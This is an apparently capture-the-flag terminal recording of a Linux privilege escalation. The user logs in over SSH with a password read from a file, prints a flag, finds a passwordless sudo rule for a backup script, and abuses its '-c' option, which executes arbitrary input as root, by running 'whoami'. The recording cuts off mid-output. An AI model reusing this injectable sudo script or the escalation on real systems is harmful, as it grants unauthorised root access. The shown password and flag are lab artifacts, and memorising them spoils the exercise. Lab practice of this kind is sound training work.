{"version": 2, "width": 95, "height": 29, "timestamp": 1781287323, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.020181, "o", "\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[2.4696, "o", "l\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[2.606248, "o", "s\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[2.746189, "o", " "]
[3.85178, "o", "\b\u001b[K\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[4.007231, "o", "\b\u001b[K\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[4.180186, "o", "\b\u001b[K\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[4.406728, "o", "c\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[4.568502, "o", "a\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[4.687558, "o", "t"]
[4.793789, "o", " "]
[4.963728, "o", "p"]
[5.022445, "o", "a"]
[5.172925, "o", "s"]
[5.303117, "o", "s"]
[5.44278, "o", "w"]
[5.708699, "o", "o"]
[5.892576, "o", "r"]
[6.053795, "o", "d"]
[6.333706, "o", "."]
[6.636449, "o", "t"]
[7.18737, "o", "x"]
[7.309615, "o", "t"]
[7.618011, "o", "\r\n\u001b[?2004l\r"]
[7.620647, "o", "S3cretP@s3\r\n"]
[7.620714, "o", "\r\n\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads\u001b[;32m]\r"]
[7.620919, "o", "\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[11.541493, "o", "c\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[11.632697, "o", "l\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[11.747175, "o", "e"]
[11.922358, "o", "a"]
[12.234485, "o", "\r\n\u001b[?2004l\r"]
[12.362535, "o", "Command 'clea' not found, did you mean:\r\n  command 'cleo' from deb cleo\r\n  command 'clear' from deb ncurses-bin\r\n  command 'clex' from deb clex\r\nTry: sudo apt install <deb name>\r\n"]
[12.370104, "o", "\r\n"]
[12.370289, "o", "\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[13.08542, "o", "c\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[13.253217, "o", "l\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[13.324751, "o", "e"]
[13.496548, "o", "a"]
[13.652254, "o", "r"]
[13.730001, "o", "\r\n\u001b[?2004l\r"]
[13.731148, "o", "\u001b[H\u001b[2J\u001b[3J"]
[13.731351, "o", "\r\n"]
[13.731531, "o", "\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[14.022419, "o", "s\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[14.131204, "o", "s\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[14.250978, "o", "h"]
[14.356092, "o", " "]
[14.935437, "o", "a"]
[15.146448, "o", "l"]
[15.217947, "o", "e"]
[15.38873, "o", "x"]
[15.797021, "o", "!"]
[16.692386, "o", "\b\u001b[K"]
[17.2609, "o", "@"]
[17.573623, "o", "1"]
[17.727107, "o", "0"]
[18.070949, "o", "."]
[20.814007, "o", "6"]
[20.948761, "o", "6"]
[21.157331, "o", "."]
[21.332875, "o", "1"]
[21.510595, "o", "5"]
[21.637992, "o", "7"]
[21.836108, "o", "."]
[22.030151, "o", "5"]
[22.108858, "o", "1"]
[22.474747, "o", "\r\n\u001b[?2004l\r"]
[22.566039, "o", "\rThe authenticity of host '10.66.157.51 (10.66.157.51)' can't be established.\r\nED25519 key fingerprint is: SHA256:hJwt8CvQHRU+h3WUZda+Xuvsp1/od2FFuBvZJJvdSHs\r\nThis host key is known by the following other names/addresses:\r\n    ~/.ssh/known_hosts:4: [hashed name]\r\nAre you sure you want to continue connecting (yes/no/[fingerprint])? "]
[23.960726, "o", "y"]
[24.0595, "o", "e"]
[24.213629, "o", "s"]
[24.306305, "o", "\r\n"]
[24.306565, "o", "Warning: Permanently added '10.66.157.51' (ED25519) to the list of known hosts.\r\r\n"]
[24.310297, "o", "** WARNING: connection is not using a post-quantum key exchange algorithm.\r\r\n** This session may be vulnerable to \"store now, decrypt later\" attacks.\r\r\n** The server may need to be upgraded. See https://openssh.com/pq.html\r\r\n"]
[24.410827, "o", "\ralex@10.66.157.51's password: "]
[27.027286, "o", "\r\n"]
[27.398516, "o", "Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)\r\n\r\n * Documentation:  https://help.ubuntu.com\r\n * Management:     https://landscape.canonical.com\r\n * Support:        https://ubuntu.com/advantage\r\n\r\n\r\n27 packages can be updated.\r\n0 updates are security updates.\r\n\r\nLast login: Fri Jun 12 10:53:12 2026 from 192.168.128.29\r\r\n"]
[27.468159, "o", "\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[30.246482, "o", "l"]
[30.32889, "o", "s"]
[30.490196, "o", "\r\n"]
[30.491512, "o", "\u001b[0m\u001b[01;34mDesktop\u001b[0m  \u001b[01;34mDocuments\u001b[0m  \u001b[01;34mDownloads\u001b[0m  \u001b[01;34mMusic\u001b[0m  \u001b[01;34mPictures\u001b[0m  \u001b[01;34mPublic\u001b[0m  \u001b[01;34mTemplates\u001b[0m  \u001b[01;32muser.txt\u001b[0m  \u001b[01;34mVideos\u001b[0m\r\n"]
[30.491958, "o", "\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[32.288807, "o", "c"]
[32.472504, "o", "a"]
[32.512439, "o", "t"]
[32.632767, "o", " "]
[32.81291, "o", "u"]
[32.895135, "o", "s"]
[33.040282, "o", "e"]
[33.180804, "o", "r"]
[33.262507, "o", "."]
[33.506353, "o", "t"]
[33.609385, "o", "x"]
[33.691008, "o", "t"]
[34.628326, "o", "\r\n"]
[34.629165, "o", "flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}\r\n"]
[34.629387, "o", "\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[37.633958, "o", "c"]
[37.730593, "o", "l"]
[37.845358, "o", "e"]
[38.03923, "o", "a"]
[38.229715, "o", "r"]
[38.346842, "o", "\r\n"]
[38.348155, "o", "\u001b[3;J\u001b[H\u001b[2J"]
[38.348528, "o", "\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[39.361379, "o", "s"]
[39.45681, "o", "u"]
[39.551966, "o", "d"]
[39.649277, "o", "o"]
[39.808905, "o", " "]
[41.691146, "o", "\b\u001b[K"]
[41.865764, "o", "\b\u001b[K"]
[42.01951, "o", "\b\u001b[K"]
[42.192149, "o", "\b\u001b[K"]
[42.878174, "o", "u"]
[43.036623, "o", " "]
[43.479235, "o", "r"]
[43.595703, "o", "o"]
[43.731228, "o", "o"]
[43.805244, "o", "t"]
[43.959326, "o", "\r\n"]
[43.962111, "o", "Password: "]
[45.5389, "o", "\r\n"]
[45.693496, "o", "\r\n"]
[46.088634, "o", "^C"]
[46.258975, "o", "^C"]
[47.127903, "o", "su: Authentication failure\r\n"]
[47.12897, "o", "\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[48.226369, "o", "s"]
[48.322363, "o", "u"]
[48.442242, "o", "d"]
[48.519111, "o", "o"]
[48.674693, "o", " "]
[48.865964, "o", "-"]
[49.080425, "o", "l"]
[49.293895, "o", "\r\n"]
[49.300691, "o", "Matching Defaults entries for alex on ubuntu:\r\n    env_reset, mail_badpass,\r\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\r\n\r\nUser alex may run the following commands on ubuntu:\r\n    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh\r\n"]
[49.30096, "o", "\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[51.143387, "o", "c"]
[51.315301, "o", "a"]
[51.430538, "o", "t"]
[51.547914, "o", " "]
[52.305285, "o", "/"]
[52.383257, "o", "e"]
[52.55706, "o", "t"]
[52.73216, "o", "c"]
[52.809035, "o", "/"]
[53.43369, "o", "m"]
[53.57062, "o", "p"]
[54.097073, "o", "3"]
[54.546409, "o", "b"]
[54.60351, "o", "a"]
[54.776162, "o", "c"]
[54.853878, "o", "k"]
[55.066775, "o", "u"]
[55.185606, "o", "p"]
[55.336579, "o", "s"]
[55.627271, "o", "\b\u001b[K"]
[56.092896, "o", "s"]
[56.947807, "o", "/"]
[57.302984, "o", "b"]
[57.399879, "o", "a"]
[57.574675, "o", "c"]
[57.630832, "o", "k"]
[57.766489, "o", "u"]
[57.903271, "o", "p"]
[58.078656, "o", "."]
[58.214404, "o", "s"]
[58.351517, "o", "h"]
[59.070909, "o", "\r\n#!/bin/bash\r\n\r\nsudo find / -name \"*.mp3\" | sudo tee /etc/mp3backups/backed_up_files.txt\r\n\r\n\r\ninput=\"/etc/mp3backups/backed_up_files.txt\"\r\n#while IFS= read -r line\r\n#do\r\n  #a=\"/etc/mp3backups/backed_up_files.txt\"\r\n#  b=$(basename $input)\r\n  #echo\r\n#  echo \"$line\"\r\n#done < \"$input\"\r\n\r\nwhile getopts c: flag\r\ndo\r\n\tcase \"${flag}\" in \r\n\t\tc) command=${OPTARG};;\r\n\tesac\r\ndone\r\n\r\n\r\n\r\nbackup_files=\"/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3\"\r\n\r\n# Where to backup to.\r\ndest=\"/etc/mp3backups/\"\r\n\r\n# Create archive filename.\r\nhostname=$(hostname -s)\r\narchive_file=\"$hostname-scheduled.tgz\"\r\n\r\n# Print start status message.\r\necho \"Backing up $backup_files to $dest/$archive_file\"\r\n\r\necho\r\n\r\n# Backup the files using tar.\r\ntar czf $dest/$archive_file $backup_files\r\n\r\n# Print end status message.\r\necho\r\necho \"Backup finished\"\r\n\r\ncmd=$($command)\r\necho $cmd\r\n\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[65.968122, "o", "c"]
[66.089818, "o", "l"]
[66.209946, "o", "e"]
[66.912171, "o", "a"]
[67.135908, "o", "r"]
[67.373343, "o", "\r\n"]
[67.374123, "o", "\u001b[3;J\u001b[H\u001b[2J"]
[67.374386, "o", "\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[67.733096, "o", "clear"]
[68.095344, "o", "\b\b\b\bat /etc/mp3backups/backup.sh"]
[69.193486, "o", "\b"]
[69.59978, "o", "\b"]
[69.637563, "o", "\b"]
[69.658493, "o", "\b"]
[69.678231, "o", "\b"]
[69.697874, "o", "\b"]
[69.718529, "o", "\b"]
[69.757762, "o", "\b"]
[69.777897, "o", "\b"]
[69.799563, "o", "\b"]
[69.820064, "o", "\b"]
[69.857787, "o", "\b"]
[69.876878, "o", "\b"]
[69.898391, "o", "\b"]
[69.918663, "o", "\b"]
[69.939098, "o", "\b"]
[69.979591, "o", "\b"]
[69.999147, "o", "\b"]
[70.018547, "o", "\b"]
[70.057726, "o", "\b"]
[70.077988, "o", "\b"]
[70.098105, "o", "\b"]
[70.119374, "o", "\b"]
[70.158592, "o", "\b"]
[70.177759, "o", "\b"]
[70.199155, "o", "\b"]
[70.216953, "o", "\b"]
[70.2571, "o", "\b"]
[70.539631, "o", "\u001b[C"]
[71.362432, "o", "\u001b[C"]
[71.586503, "o", "\b\u001b[1P /etc/mp3backups/backup.sh\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[71.746537, "o", "\b\u001b[1P /etc/mp3backups/backup.sh\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[71.906411, "o", "\b\u001b[1P /etc/mp3backups/backup.sh\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[72.065392, "o", "\u0007"]
[72.406449, "o", "s /etc/mp3backups/backup.sh\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[72.508553, "o", "u /etc/mp3backups/backup.sh\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[72.630828, "o", "d /etc/mp3backups/backup.sh\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[72.689026, "o", "o /etc/mp3backups/backup.sh\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[72.847768, "o", "\u001b[C /etc/mp3backups/backup.sh\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[73.445388, "o", "\u001b[1P/etc/mp3backups/backup.sh\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[74.107476, "o", "\u001b[C"]
[74.470001, "o", "\u001b[C"]
[74.508389, "o", "\u001b[C"]
[74.528752, "o", "\u001b[C"]
[74.546419, "o", "\u001b[C"]
[74.566505, "o", "\u001b[C"]
[74.606512, "o", "\u001b[C"]
[74.626633, "o", "\u001b[C"]
[74.645846, "o", "\u001b[C"]
[74.665337, "o", "\u001b[C"]
[74.70613, "o", "\u001b[C"]
[74.725916, "o", "\u001b[C"]
[74.744761, "o", "\u001b[C"]
[74.769119, "o", "\u001b[C"]
[74.80501, "o", "\u001b[C"]
[74.824922, "o", "\u001b[C"]
[74.843571, "o", "\u001b[C"]
[74.863624, "o", "\u001b[C"]
[74.901396, "o", "\u001b[C"]
[74.921121, "o", "\u001b[C"]
[74.941695, "o", "\u001b[C"]
[74.982196, "o", "\u001b[C"]
[75.002168, "o", "\u001b[C"]
[75.022721, "o", "\u001b[C"]
[75.245309, "o", "\u001b[C"]
[75.646892, "o", "\u001b[C"]
[76.205332, "o", " "]
[76.465483, "o", "'"]
[77.085419, "o", "e"]
[77.263024, "o", "c"]
[77.302593, "o", "h"]
[77.410403, "o", "o"]
[78.692512, "o", " "]
[79.402754, "o", "'"]
[79.95158, "o", "H"]
[80.072161, "o", "e"]
[80.171299, "o", "l"]
[80.29269, "o", "l"]
[80.434234, "o", "o"]
[81.13122, "o", "'"]
[81.270937, "o", "'"]
[81.835794, "o", "\r\n"]
[82.747849, "o", "find: ‘/run/user/108/gvfs’: Permission denied\r\n/home/alex/Music/image12.mp3\r\n/home/alex/Music/image7.mp3\r\n/home/alex/Music/image1.mp3\r\n/home/alex/Music/image10.mp3\r\n"]
[82.763905, "o", "/home/alex/Music/image5.mp3\r\n/home/alex/Music/image4.mp3\r\n/home/alex/Music/image3.mp3\r\n/home/alex/Music/image6.mp3\r\n/home/alex/Music/image8.mp3\r\n/home/alex/Music/image9.mp3\r\n/home/alex/Music/image11.mp3\r\n/home/alex/Music/image2.mp3\r\nBacking up /home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3 to /etc/mp3backups//ubuntu-scheduled.tgz\r\n\r\ntar: Removing leading `/' from member names\r\ntar: /home/alex/Music/song1.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song2.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song3.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song4.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song5.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song6.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song7.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song8.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song9.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song10.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song11.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song12.mp3: Cannot stat: No such file or directory\r\ntar: Exiting with failure status due to previous errors\r\n\r\nBackup finished\r\n\r\n\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[84.405101, "o", "c"]
[84.525854, "o", "l"]
[84.64439, "o", "e"]
[84.866361, "o", "a"]
[85.063642, "o", "r"]
[85.17947, "o", "\r\n"]
[85.180755, "o", "\u001b[3;J\u001b[H\u001b[2J"]
[85.181442, "o", "\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[85.554302, "o", "clear"]
[86.342893, "o", "\b\b\b\b\bsudo /etc/mp3backups/backup.sh 'echo 'Hello''"]
[87.175646, "o", "\b"]
[87.546682, "o", "\b"]
[87.922564, "o", "\u001b[C"]
[88.434029, "o", "\u001b[K\b"]
[88.884896, "o", "\b"]
[89.042445, "o", "\b"]
[89.182579, "o", "\b"]
[89.320769, "o", "\b"]
[89.483387, "o", "\b"]
[90.211259, "o", "\b\u001b[1PHello'\b\b\b\b\b\b"]
[91.294697, "o", "\r\n"]
[92.240413, "o", "find: ‘/run/user/108/gvfs’: Permission denied\r\n/home/alex/Music/image12.mp3\r\n/home/alex/Music/image7.mp3\r\n/home/alex/Music/image1.mp3\r\n/home/alex/Music/image10.mp3\r\n"]
[92.256107, "o", "/home/alex/Music/image5.mp3\r\n/home/alex/Music/image4.mp3\r\n/home/alex/Music/image3.mp3\r\n/home/alex/Music/image6.mp3\r\n/home/alex/Music/image8.mp3\r\n/home/alex/Music/image9.mp3\r\n/home/alex/Music/image11.mp3\r\n/home/alex/Music/image2.mp3\r\nBacking up /home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3 to /etc/mp3backups//ubuntu-scheduled.tgz\r\n\r\ntar: Removing leading `/' from member names\r\ntar: /home/alex/Music/song1.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song2.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song3.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song4.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song5.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song6.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song7.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song8.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song9.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song10.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song11.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song12.mp3: Cannot stat: No such file or directory\r\ntar: Exiting with failure status due to previous errors\r\n\r\nBackup finished\r\n\r\n\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[93.551262, "o", "c"]
[93.688948, "o", "l"]
[93.768356, "o", "e"]
[93.945375, "o", "a"]
[94.103915, "o", "r"]
[94.201894, "o", "\r\n"]
[94.203222, "o", "\u001b[3;J\u001b[H\u001b[2J"]
[94.203631, "o", "\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[95.064285, "o", "clear"]
[95.200283, "o", "\b\b\b\b\bsudo /etc/mp3backups/backup.sh 'echo Hello'"]
[95.855304, "o", "\b"]
[96.110695, "o", "\u001b[C"]
[97.928618, "o", "\b"]
[99.399826, "o", "\b\u001b[1P'\b"]
[99.538724, "o", "\b\u001b[1P'\b"]
[99.695007, "o", "\b\u001b[1P'\b"]
[99.832507, "o", "\b\u001b[1P'\b"]
[99.991042, "o", "\b\u001b[1P'\b"]
[100.16736, "o", "\b\u001b[1P'\b"]
[100.344787, "o", "\b\u001b[1P'\b"]
[100.518842, "o", "\b\u001b[1P'\b"]
[100.697034, "o", "\b\u001b[1P'\b"]
[101.030901, "o", "\b\u001b[1P'\b"]
[101.565368, "o", "l'\b"]
[101.642632, "o", "s'\b"]
[101.721008, "o", " '\b"]
[101.955422, "o", "/'\b"]
[102.078247, "o", "r'\b"]
[102.216815, "o", "o'\b"]
[102.354367, "o", "o'\b"]
[102.452136, "o", "t'\b"]
[102.684883, "o", "\b\u001b[1P'\b"]
[102.842683, "o", "\b\u001b[1P'\b"]
[103.005135, "o", "\b\u001b[1P'\b"]
[103.144086, "o", "\b\u001b[1P'\b"]
[103.299519, "o", "\b\u001b[1P'\b"]
[103.456769, "o", "\b\u001b[1P'\b"]
[103.632631, "o", "\b\u001b[1P'\b"]
[103.848887, "o", "\b\u001b[1P'\b"]
[104.025431, "o", "w'\b"]
[104.166632, "o", "h'\b"]
[104.260469, "o", "o'\b"]
[104.535433, "o", "a'\b"]
[104.637169, "o", "m'\b"]
[104.735428, "o", "i'\b"]
[104.988241, "o", "\r\n"]
[105.964957, "o", "find: ‘/run/user/108/gvfs’: Permission denied/home/alex/Music/image12.mp3\r\n/home/alex/Music/image7.mp3\r\n/home/alex/Music/image1.mp3\r\n/home/alex/Music/image10.mp3"]
[105.965344, "o", "\r\n/home/alex/Music/image5.mp3\r\n/home/alex/Music/image4.mp3\r\n/home/alex/Music/image3.mp3\r\n/home/alex/Music/image6.mp3\r\n/home/alex/Music/image8.mp3\r\n/home/alex/Music/image9.mp3\r\n/home/alex/Music/image11.mp3\r\n/home/alex/Music/image2.mp3\r\n\r\n"]
[105.972359, "o", "Backing up /home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3 to /etc/mp3backups//ubuntu-scheduled.tgz\r\n\r\n"]
[105.974394, "o", "tar: Removing leading `/' from member names\r\n"]
[105.974868, "o", "tar: /home/alex/Music/song1.mp3: Cannot stat: No such file or directory"]
[105.979891, "o", "\r\ntar: /home/alex/Music/song2.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song3.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song4.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song5.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song6.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song7.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song8.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song9.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song10.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song11.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song12.mp3: Cannot stat: No such file or directory\r\ntar: Exiting with failure status due to previous errors\r\n\r\nBackup finished\r\n\r\n\u001b]0;alex@ubuntu: ~\u0007\u001b[01;32malex@ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[111.086302, "o", "sudo /etc/mp3backups/backup.sh 'whoami'"]
[112.130695, "o", "\b"]
[112.517253, "o", "\b"]
[112.535047, "o", "\b"]
[112.555706, "o", "\b"]
[112.57621, "o", "\b"]
[112.597915, "o", "\b"]
[112.638135, "o", "\b"]
[112.658024, "o", "\b"]
[112.682466, "o", "\b"]
[112.697643, "o", "\b"]
[112.717687, "o", "\b"]
[112.75651, "o", "\b"]
[113.041971, "o", "\u001b[C"]
[113.225859, "o", "\u001b[C"]
[113.367574, "o", "\u001b[C"]
[113.692199, "o", "\u001b[C"]
[114.392196, "o", "\u001b[C"]
[114.8013, "o", "\u001b[C"]
[114.820699, "o", "\u001b[C"]
[114.861027, "o", "\u001b[C"]
[114.881547, "o", "\u001b[C"]
[114.90178, "o", "\u001b[C"]
[114.922339, "o", "\u001b[C"]
[114.941768, "o", "\u001b[C"]
[114.982131, "o", "\u0007"]
[115.002868, "o", "\u0007"]
[115.023794, "o", "\u0007"]
[115.044044, "o", "\u0007"]
[115.063008, "o", "\u0007"]
[115.105994, "o", "\u0007"]
[115.26784, "o", "\b"]
[115.427758, "o", "\b"]
[115.589123, "o", "\b"]
[115.731235, "o", "\b"]
[115.84782, "o", "\b"]
[115.990033, "o", "\b"]
[116.110411, "o", "\b"]
[116.252622, "o", "\b"]
[117.231104, "o", "-'whoami'\b\b\b\b\b\b\b\b"]
[117.374525, "o", "c'whoami'\b\b\b\b\b\b\b\b"]
[117.475728, "o", " 'whoami'\b\b\b\b\b\b\b\b"]
[118.083102, "o", "\r\n"]
[119.090428, "o", "/home/alex/Music/image12.mp3\r\n/home/alex/Music/image7.mp3\r\n/home/alex/Music/image1.mp3"]
[119.091548, "o", "\r\n/home/alex/Music/image10.mp3\r\n/home/alex/Music/image5.mp3\r\n"]
[119.106536, "o", "/home/alex/Music/image4.mp3\r\n/home/alex/Music/image3.mp3\r\n/home/alex/Music/image6.mp3\r\n/home/alex/Music/image8.mp3\r\n/home/alex/Music/image9.mp3\r\n/home/alex/Music/image11.mp3\r\n/home/alex/Music/image2.mp3\r\nfind: ‘/run/user/108/gvfs’: Permission denied\r\nBacking up /home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3 to /etc/mp3backups//ubuntu-scheduled.tgz\r\n\r\ntar: Removing leading `/' from member names\r\ntar: /home/alex/Music/song1.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song2.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song3.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song4.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song5.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song6.mp3: Cannot stat: No such file or directory\r\ntar: /home/alex/Music/song7.mp3: Cannot 